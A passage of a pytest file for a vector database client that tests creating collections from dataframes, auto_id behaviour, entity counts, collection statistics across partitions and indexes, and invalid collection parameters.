assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_none_dataframe(self):
"""
target: test create collection by empty dataframe
method: invalid dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: non-dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with invalid dataframe
method: create with invalid dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_with_none_auto_id(self):
"""
target: test construct with non-int64 as primary field
method: non-int64 as primary field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and not insert ids(primary fields all values are None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
expected: todo
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: two collection object is correct
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities raise exception
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities raise exception
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
class TestCollectionMultiCollections:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: status not ok
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
expected: segment = []
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["row_count"]
# pdb.set_trace()
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of vectors
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the collection count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
get_simple_index.update({"metric_type": "IP"})
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
# pdb.set_trace()
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
